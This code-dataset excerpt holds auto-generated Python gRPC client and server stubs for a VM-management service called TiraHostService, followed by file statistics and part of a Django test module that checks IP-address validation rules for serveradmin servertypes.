self.run_execute = channel.unary_unary(
'/tira.generated.TiraHostService/run_execute',
request_serializer=tira__host__pb2.RunDetails.SerializeToString,
response_deserializer=tira__host__pb2.Transaction.FromString,
)
self.run_eval = channel.unary_unary(
'/tira.generated.TiraHostService/run_eval',
request_serializer=tira__host__pb2.RunDetails.SerializeToString,
response_deserializer=tira__host__pb2.Transaction.FromString,
)
self.alive = channel.unary_unary(
'/tira.generated.TiraHostService/alive',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class TiraHostServiceServicer(object):
"""-----------------------------------------------------------------------------
Definitions
-----------------------------------------------------------------------------
The service definition.
"""
def vm_backup(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def vm_create(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def vm_delete(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def vm_info(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def vm_list(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def vm_metrics(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def vm_sandbox(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def vm_shutdown(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def vm_snapshot(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def vm_start(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def vm_stop(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def vm_unsandbox(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def run_execute(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def run_eval(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def alive(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_TiraHostServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'vm_backup': grpc.unary_unary_rpc_method_handler(
servicer.vm_backup,
request_deserializer=tira__host__pb2.VmDetails.FromString,
response_serializer=tira__host__pb2.Transaction.SerializeToString,
),
'vm_create': grpc.unary_unary_rpc_method_handler(
servicer.vm_create,
request_deserializer=tira__host__pb2.VmDetails.FromString,
response_serializer=tira__host__pb2.Transaction.SerializeToString,
),
'vm_delete': grpc.unary_unary_rpc_method_handler(
servicer.vm_delete,
request_deserializer=tira__host__pb2.VmDetails.FromString,
response_serializer=tira__host__pb2.Transaction.SerializeToString,
),
'vm_info': grpc.unary_unary_rpc_method_handler(
servicer.vm_info,
request_deserializer=tira__host__pb2.VmDetails.FromString,
response_serializer=tira__host__pb2.VmInfo.SerializeToString,
),
'vm_list': grpc.unary_unary_rpc_method_handler(
servicer.vm_list,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=tira__host__pb2.Transaction.SerializeToString,
),
'vm_metrics': grpc.unary_unary_rpc_method_handler(
servicer.vm_metrics,
request_deserializer=tira__host__pb2.VmDetails.FromString,
response_serializer=tira__host__pb2.Transaction.SerializeToString,
),
'vm_sandbox': grpc.unary_unary_rpc_method_handler(
servicer.vm_sandbox,
request_deserializer=tira__host__pb2.VmDetails.FromString,
response_serializer=tira__host__pb2.Transaction.SerializeToString,
),
'vm_shutdown': grpc.unary_unary_rpc_method_handler(
servicer.vm_shutdown,
request_deserializer=tira__host__pb2.VmDetails.FromString,
response_serializer=tira__host__pb2.Transaction.SerializeToString,
),
'vm_snapshot': grpc.unary_unary_rpc_method_handler(
servicer.vm_snapshot,
request_deserializer=tira__host__pb2.VmDetails.FromString,
response_serializer=tira__host__pb2.Transaction.SerializeToString,
),
'vm_start': grpc.unary_unary_rpc_method_handler(
servicer.vm_start,
request_deserializer=tira__host__pb2.VmDetails.FromString,
response_serializer=tira__host__pb2.Transaction.SerializeToString,
),
'vm_stop': grpc.unary_unary_rpc_method_handler(
servicer.vm_stop,
request_deserializer=tira__host__pb2.VmDetails.FromString,
response_serializer=tira__host__pb2.Transaction.SerializeToString,
),
'vm_unsandbox': grpc.unary_unary_rpc_method_handler(
servicer.vm_unsandbox,
request_deserializer=tira__host__pb2.VmDetails.FromString,
response_serializer=tira__host__pb2.Transaction.SerializeToString,
),
'run_execute': grpc.unary_unary_rpc_method_handler(
servicer.run_execute,
request_deserializer=tira__host__pb2.RunDetails.FromString,
response_serializer=tira__host__pb2.Transaction.SerializeToString,
),
'run_eval': grpc.unary_unary_rpc_method_handler(
servicer.run_eval,
request_deserializer=tira__host__pb2.RunDetails.FromString,
response_serializer=tira__host__pb2.Transaction.SerializeToString,
),
'alive': grpc.unary_unary_rpc_method_handler(
servicer.alive,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'tira.generated.TiraHostService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class TiraHostService(object):
"""-----------------------------------------------------------------------------
Definitions
-----------------------------------------------------------------------------
The service definition.
"""
@staticmethod
def vm_backup(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_backup',
tira__host__pb2.VmDetails.SerializeToString,
tira__host__pb2.Transaction.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def vm_create(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_create',
tira__host__pb2.VmDetails.SerializeToString,
tira__host__pb2.Transaction.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def vm_delete(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_delete',
tira__host__pb2.VmDetails.SerializeToString,
tira__host__pb2.Transaction.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def vm_info(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_info',
tira__host__pb2.VmDetails.SerializeToString,
tira__host__pb2.VmInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def vm_list(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_list',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
tira__host__pb2.Transaction.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def vm_metrics(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_metrics',
tira__host__pb2.VmDetails.SerializeToString,
tira__host__pb2.Transaction.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def vm_sandbox(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_sandbox',
tira__host__pb2.VmDetails.SerializeToString,
tira__host__pb2.Transaction.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def vm_shutdown(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_shutdown',
tira__host__pb2.VmDetails.SerializeToString,
tira__host__pb2.Transaction.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def vm_snapshot(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_snapshot',
tira__host__pb2.VmDetails.SerializeToString,
tira__host__pb2.Transaction.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def vm_start(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_start',
tira__host__pb2.VmDetails.SerializeToString,
tira__host__pb2.Transaction.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def vm_stop(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_stop',
tira__host__pb2.VmDetails.SerializeToString,
tira__host__pb2.Transaction.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def vm_unsandbox(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_unsandbox',
tira__host__pb2.VmDetails.SerializeToString,
tira__host__pb2.Transaction.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def run_execute(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/run_execute',
tira__host__pb2.RunDetails.SerializeToString,
tira__host__pb2.Transaction.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def run_eval(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/run_eval',
tira__host__pb2.RunDetails.SerializeToString,
tira__host__pb2.Transaction.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def alive(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/alive',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
class TiraApplicationServiceStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.set_state = channel.unary_unary(
'/tira.generated.TiraApplicationService/set_state',
request_serializer=tira__host__pb2.VmState.SerializeToString,
response_deserializer=tira__host__pb2.Transaction.FromString,
)
self.confirm_creation = channel.unary_unary(
'/tira.generated.TiraApplicationService/confirm_creation',
request_serializer=tira__host__pb2.VmState.SerializeToString,
response_deserializer=tira__host__pb2.Transaction.FromString,
)
self.complete_transaction = channel.unary_unary(
'/tira.generated.TiraApplicationService/complete_transaction',
request_serializer=tira__host__pb2.Transaction.SerializeToString,
response_deserializer=tira__host__pb2.Transaction.FromString,
)
class TiraApplicationServiceServicer(object):
"""Missing associated documentation comment in .proto file."""
def set_state(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def confirm_creation(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def complete_transaction(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_TiraApplicationServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'set_state': grpc.unary_unary_rpc_method_handler(
servicer.set_state,
request_deserializer=tira__host__pb2.VmState.FromString,
response_serializer=tira__host__pb2.Transaction.SerializeToString,
),
'confirm_creation': grpc.unary_unary_rpc_method_handler(
servicer.confirm_creation,
request_deserializer=tira__host__pb2.VmState.FromString,
response_serializer=tira__host__pb2.Transaction.SerializeToString,
),
'complete_transaction': grpc.unary_unary_rpc_method_handler(
servicer.complete_transaction,
request_deserializer=tira__host__pb2.Transaction.FromString,
response_serializer=tira__host__pb2.Transaction.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'tira.generated.TiraApplicationService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class TiraApplicationService(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def set_state(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraApplicationService/set_state',
tira__host__pb2.VmState.SerializeToString,
tira__host__pb2.Transaction.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def confirm_creation(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraApplicationService/confirm_creation',
tira__host__pb2.VmState.SerializeToString,
tira__host__pb2.Transaction.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def complete_transaction(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraApplicationService/complete_transaction',
tira__host__pb2.Transaction.SerializeToString,
tira__host__pb2.Transaction.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 44.191964
| 124
| 0.639627
| 2,713
| 29,697
| 6.640251
| 0.046074
| 0.044852
| 0.061671
| 0.062281
| 0.934666
| 0.915293
| 0.894643
| 0.84524
| 0.795337
| 0.782348
| 0
| 0.005166
| 0.269926
| 29,697
| 671
| 125
| 44.257824
| 0.825746
| 0.070647
| 0
| 0.701599
| 1
| 0
| 0.09598
| 0.059174
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071048
| false
| 0
| 0.005329
| 0.031972
| 0.119005
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
13147e9b2e6d8f5574decc7387c9c17373ff7dd0
| 19,829
|
py
|
Python
|
serveradmin/serverdb/tests/test_ip_addr_type.py
|
abdulkadirakin/serveradmin
|
4c2aa478d44464709430bdc98d885e5f47c2359e
|
[
"MIT"
] | null | null | null |
serveradmin/serverdb/tests/test_ip_addr_type.py
|
abdulkadirakin/serveradmin
|
4c2aa478d44464709430bdc98d885e5f47c2359e
|
[
"MIT"
] | null | null | null |
serveradmin/serverdb/tests/test_ip_addr_type.py
|
abdulkadirakin/serveradmin
|
4c2aa478d44464709430bdc98d885e5f47c2359e
|
[
"MIT"
] | null | null | null |
"""Serveradmin - ip_addr_type validation tests
Copyright (c) 2021 InnoGames GmbH
"""
import logging
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
from django.test.testcases import TransactionTestCase
from faker import Faker
from faker.providers import internet
from serveradmin.dataset import Query, DatasetObject
from serveradmin.serverdb.forms import ServertypeAttributeAdminForm
from serveradmin.serverdb.models import ServertypeAttribute
# TODO: Remove "InternIp" classes when intern_ip is gone.
#
# Once we eliminated the special attribute intern_ip we can get rid of the
# test classes with "InternIp" in name.
class TestIpAddrType(TransactionTestCase):
fixtures = ['auth_user.json', 'ip_addr_type.json']
@classmethod
def setUpClass(cls):
logging.getLogger('faker').setLevel(logging.ERROR)
def setUp(self):
self.faker = Faker()
self.faker.add_provider(internet)
def _get_server(self, servertype: str) -> DatasetObject:
server = Query().new_object(servertype)
server['hostname'] = self.faker.hostname()
return server
class TestIpAddrTypeNullForInternIp(TestIpAddrType):
"""Most important tests for ip_addr_type null and intern_ip"""
def test_server_without_intern_ip(self):
server = self._get_server('null')
self.assertIsNone(server.commit(user=User.objects.first()))
def test_server_with_intern_ip(self):
server = self._get_server('null')
server['intern_ip'] = '10.0.0.1'
with self.assertRaises(ValidationError):
server.commit(user=User.objects.first())
class TestIpAddrTypeNullForInetAttributes(TestIpAddrType):
"""Most important tests for ip_addr_type null and inet attributes"""
def test_add_inet_attribute_in_admin_panel(self):
attr = ServertypeAttribute(
attribute_id='ip_config', servertype_id='null')
form = ServertypeAttributeAdminForm(
data={
'attribute': 'ip_config',
'servertype': 'null',
}, instance=attr)
form.is_valid()
with self.assertRaises(ValidationError):
form.clean()
class TestIpAddrTypeHostForInternIp(TestIpAddrType):
"""Most important tests for ip_addr_type host and intern_ip"""
def test_server_without_value(self):
server = self._get_server('host')
with self.assertRaises(ValidationError):
server.commit(user=User.objects.first())
def test_server_with_value(self):
server = self._get_server('host')
server['intern_ip'] = '10.0.0.1/32'
self.assertIsNone(server.commit(user=User.objects.first()))
def test_server_with_invalid_value(self):
server = self._get_server('host')
server['intern_ip'] = 'nonsense'
with self.assertRaises(ValidationError):
server.commit(user=User.objects.first())
def test_server_with_ip_network(self):
server = self._get_server('host')
server['intern_ip'] = '10.0.0.0/16'
with self.assertRaises(ValidationError):
server.commit(user=User.objects.first())
def test_server_with_duplicate_intern_ip(self):
first = self._get_server('host')
first['intern_ip'] = '10.0.0.1/32'
first.commit(user=User.objects.first())
second = self._get_server('host')
second['intern_ip'] = '10.0.0.1'
with self.assertRaises(ValidationError):
second.commit(user=User.objects.first())
def test_server_with_duplicate_inet_ip(self):
first = self._get_server('host')
first['intern_ip'] = '10.0.0.1/32'
first['ip_config'] = '10.0.0.2/32'
first.commit(user=User.objects.first())
# Test "cross" duplicate attribute denial
duplicate = self._get_server('host')
duplicate['intern_ip'] = '10.0.0.2/32'
with self.assertRaises(ValidationError):
duplicate.commit(user=User.objects.first())
def test_change_server_hostname(self):
server = self._get_server('host')
server['intern_ip'] = '10.0.0.1/32'
server.commit(user=User.objects.first())
to_rename = Query({'hostname': server['hostname']}, ['hostname'])
to_rename.update(hostname=self.faker.hostname())
self.assertIsNone(to_rename.commit(user=User.objects.first()))
class TestIpAddrTypeHostForInetAttributes(TestIpAddrType):
"""Most important tests for ip_addr_type host and inet attributes"""
def test_server_without_value(self):
server = self._get_server('host')
server['intern_ip'] = '10.0.0.1/32'
self.assertIsNone(server.commit(user=User.objects.first()))
def test_server_with_value(self):
server = self._get_server('host')
server['intern_ip'] = '10.0.0.1/32'
server['ip_config'] = '10.0.0.2/32'
self.assertIsNone(server.commit(user=User.objects.first()))
def test_server_with_invalid_value(self):
server = self._get_server('host')
server['intern_ip'] = '10.0.0.1/32'
server['ip_config'] = 'nonsense'
with self.assertRaises(ValidationError):
server.commit(user=User.objects.first())
def test_server_with_ip_network(self):
server = self._get_server('host')
server['intern_ip'] = '10.0.0.1/32'
server['ip_config'] = '10.0.0.0/16'
with self.assertRaises(ValidationError):
server.commit(user=User.objects.first())
def test_server_with_duplicate_inet_attribute(self):
first = self._get_server('host')
first['intern_ip'] = '10.0.0.1/32'
first['ip_config'] = '10.0.0.2/32'
first.commit(user=User.objects.first())
second = self._get_server('host')
second['intern_ip'] = '10.0.0.3/32'
second['ip_config'] = '10.0.0.2/32'
with self.assertRaises(ValidationError):
second.commit(user=User.objects.first())
def test_server_overlaps_with_network(self):
network = self._get_server('network')
network['intern_ip'] = '10.0.0.5/32'
network['ip_config'] = '10.0.1.5/32'
network.commit(user=User.objects.first())
# An ip_address must not collide with the smallest possible network
server = self._get_server('host')
server['intern_ip'] = '10.0.0.1/32'
server['ip_config'] = '10.0.1.5/32'
self.assertIsNone(server.commit(user=User.objects.first()))
def test_server_with_duplicate_intern_ip(self):
first = self._get_server('host')
first['intern_ip'] = '10.0.0.1/32'
first['ip_config'] = '10.0.0.2/32'
first.commit(user=User.objects.first())
# Test "cross" duplicate attribute denial
duplicate = self._get_server('host')
duplicate['intern_ip'] = '10.0.0.3/32'
duplicate['ip_config'] = '10.0.0.1/32'
with self.assertRaises(ValidationError):
duplicate.commit(user=User.objects.first())
def test_server_with_duplicate_inet_different_attrs(self):
server = self._get_server('host')
server['intern_ip'] = '10.0.0.1/32'
server['ip_config'] = '10.0.0.2/32'
server.commit(user=User.objects.first())
duplicate = self._get_server('host')
duplicate['intern_ip'] = '10.0.0.3/32'
duplicate['ip_config_new'] = '10.0.0.2/32'
with self.assertRaises(ValidationError):
duplicate.commit(user=User.objects.first())
def test_server_with_duplicate_inet_for_loadbalancer(self):
server = self._get_server('loadbalancer')
server['intern_ip'] = '10.0.0.1/32'
server.commit(user=User.objects.first())
duplicate = self._get_server('host')
duplicate['intern_ip'] = '10.0.0.2/32'
duplicate['ip_config'] = '10.0.0.1/32'
with self.assertRaises(ValidationError):
duplicate.commit(user=User.objects.first())
def test_change_server_hostname(self):
server = self._get_server('host')
server['intern_ip'] = '10.0.0.1/32'
server['ip_config'] = '10.0.0.2/32'
server.commit(user=User.objects.first())
to_rename = Query({'hostname': server['hostname']}, ['hostname'])
to_rename.update(hostname=self.faker.hostname())
self.assertIsNone(to_rename.commit(user=User.objects.first()))
class TestIpAddrTypeLoadbalancerForInternIp(TestIpAddrType):
"""Most important tests for ip_addr_type loadbalancer and intern_ip"""
def test_server_without_value(self):
server = self._get_server('loadbalancer')
with self.assertRaises(ValidationError):
server.commit(user=User.objects.first())
def test_server_with_value(self):
server = self._get_server('loadbalancer')
server['intern_ip'] = '10.0.0.1/32'
self.assertIsNone(server.commit(user=User.objects.first()))
def test_server_with_ip_network(self):
server = self._get_server('loadbalancer')
server['intern_ip'] = '10.0.0.0/16'
with self.assertRaises(ValidationError):
server.commit(user=User.objects.first())
def test_server_with_duplicate_intern_ip(self):
first = self._get_server('loadbalancer')
first['intern_ip'] = '10.0.0.1/32'
first.commit(user=User.objects.first())
second = self._get_server('loadbalancer')
second['intern_ip'] = '10.0.0.1/32'
self.assertIsNone(second.commit(user=User.objects.first()))
def test_change_server_hostname(self):
server = self._get_server('loadbalancer')
server['intern_ip'] = '10.0.0.1/32'
server.commit(user=User.objects.first())
to_rename = Query({'hostname': server['hostname']}, ['hostname'])
to_rename.update(hostname=self.faker.hostname())
self.assertIsNone(to_rename.commit(user=User.objects.first()))
class TestIpAddrTypeLoadbalancerForInetAttributes(TestIpAddrType):
"""Most important tests for ip_addr_type loadbalancer and inet attrs"""
def test_server_without_value(self):
server = self._get_server('loadbalancer')
server['intern_ip'] = '10.0.0.1/32'
self.assertIsNone(server.commit(user=User.objects.first()))
def test_server_with_value(self):
server = self._get_server('loadbalancer')
server['intern_ip'] = '10.0.0.1/32'
server['ip_config'] = '10.0.0.2/32'
self.assertIsNone(server.commit(user=User.objects.first()))
def test_server_with_ip_network(self):
server = self._get_server('loadbalancer')
server['intern_ip'] = '10.0.0.1/32'
server['ip_config'] = '10.0.0.0/16'
with self.assertRaises(ValidationError):
server.commit(user=User.objects.first())
def test_server_with_duplicate_inet_attribute(self):
first = self._get_server('loadbalancer')
first['intern_ip'] = '10.0.0.1/32'
first['ip_config'] = '10.0.0.2/32'
first.commit(user=User.objects.first())
second = self._get_server('loadbalancer')
second['intern_ip'] = '10.0.0.1/32'
second['ip_config'] = '10.0.0.2/32'
self.assertIsNone(second.commit(user=User.objects.first()))
def test_server_with_duplicate_inet_ip(self):
first = self._get_server('loadbalancer')
first['intern_ip'] = '10.0.0.1/32'
first['ip_config'] = '10.0.0.2/32'
first.commit(user=User.objects.first())
# Test "cross" duplicate attribute is denied
duplicate = self._get_server('host')
duplicate['intern_ip'] = '10.0.0.2/32'
duplicate['ip_config'] = '10.0.0.1/32'
with self.assertRaises(ValidationError):
duplicate.commit(user=User.objects.first())
def test_server_with_duplicate_inet_different_attrs(self):
server = self._get_server('loadbalancer')
server['intern_ip'] = '10.0.0.1/32'
server['ip_config'] = '10.0.0.2/32'
server.commit(user=User.objects.first())
duplicate = self._get_server('loadbalancer')
duplicate['intern_ip'] = '10.0.0.3/32'
duplicate['ip_config_new'] = '10.0.0.2/32'
self.assertIsNone(duplicate.commit(user=User.objects.first()))
def test_change_server_hostname(self):
server = self._get_server('loadbalancer')
server['intern_ip'] = '10.0.0.1/32'
server['ip_config'] = '10.0.0.2/32'
server.commit(user=User.objects.first())
to_rename = Query({'hostname': server['hostname']}, ['hostname'])
to_rename.update(hostname=self.faker.hostname())
self.assertIsNone(to_rename.commit(user=User.objects.first()))
class TestIpAddrTypeNetworkForInternIp(TestIpAddrType):
"""Most important tests for ip_addr_type network and intern_ip"""
def test_server_without_value(self):
server = self._get_server('network')
with self.assertRaises(ValidationError):
server.commit(user=User.objects.first())
def test_server_with_value(self):
server = self._get_server('network')
server['intern_ip'] = '10.0.0.0/16'
self.assertIsNone(server.commit(user=User.objects.first()))
def test_server_with_invalid_value(self):
server = self._get_server('host')
server['intern_ip'] = 'nonsense'
with self.assertRaises(ValidationError):
server.commit(user=User.objects.first())
def test_server_with_invalid_network(self):
server = self._get_server('network')
server['intern_ip'] = '10.0.0.5/16' # Invalid: Has host bits set
with self.assertRaises(ValidationError):
server.commit(user=User.objects.first())
def test_server_with_ip_address(self):
server = self._get_server('network')
server['intern_ip'] = '10.0.0.1/32' # Just a very small network
self.assertIsNone(server.commit(user=User.objects.first()))
def test_server_network_overlaps(self):
first = self._get_server('network')
first['intern_ip'] = '10.0.0.0/30'
first.commit(user=User.objects.first())
overlaps = self._get_server('network')
overlaps['intern_ip'] = '10.0.0.0/28'
with self.assertRaises(ValidationError):
overlaps.commit(user=User.objects.first())
def test_server_network_overlaps_inet(self):
first = self._get_server('network')
first['intern_ip'] = '10.0.0.0/30'
first['ip_config'] = '10.0.1.0/30'
first.commit(user=User.objects.first())
overlaps = self._get_server('network')
overlaps['intern_ip'] = '10.0.1.0/28'
with self.assertRaises(ValidationError):
overlaps.commit(user=User.objects.first())
def test_server_network_overlaps_other_servertype(self):
first = self._get_server('network')
first['intern_ip'] = '10.0.0.0/30'
first.commit(user=User.objects.first())
# A network can overlap with networks of other servertypes
overlaps = self._get_server('other_network')
overlaps['intern_ip'] = '10.0.0.0/28'
self.assertIsNone(overlaps.commit(user=User.objects.first()))
def test_change_server_hostname(self):
server = self._get_server('network')
server['intern_ip'] = '10.0.0.0/30'
server.commit(user=User.objects.first())
to_rename = Query({'hostname': server['hostname']}, ['hostname'])
to_rename.update(hostname=self.faker.hostname())
self.assertIsNone(to_rename.commit(user=User.objects.first()))
class TestIpAddrTypeNetworkForInetAttributes(TestIpAddrType):
"""Most important tests for ip_addr_type network and inet attrs"""
def test_server_without_value(self):
server = self._get_server('network')
server['intern_ip'] = '10.0.0.0/16'
self.assertIsNone(server.commit(user=User.objects.first()))
def test_server_with_value(self):
